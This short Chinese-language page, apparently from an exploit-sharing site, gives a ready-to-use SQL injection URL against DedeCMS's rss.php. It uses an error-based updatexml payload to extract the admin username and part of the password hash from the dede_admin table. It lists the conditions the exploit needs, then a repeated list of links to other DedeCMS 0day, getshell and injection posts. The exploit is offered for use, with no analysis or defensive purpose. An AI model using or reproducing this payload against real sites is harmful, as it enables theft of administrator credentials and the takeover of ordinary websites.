EXP:
uploads/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1
利用环境:
GPC off
有updatexml函数
只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27864, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35445, 评论: 0)
dedecms默认的注册用户 (浏览: 12968, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13760, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16390, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37600, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22240, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10279, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 18107, 评论: 0)
DedeCms V5.6 注入 0day (浏览: 10750, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35445, 评论: 0)
dedecms默认的注册用户 (浏览: 12968, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13760, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16390, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37600, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22240, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10279, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 18107, 评论: 0)
DedeCms V5.6 注入 0day (浏览: 10750, 评论: 0)
Trackbacks
 |
 |
 |
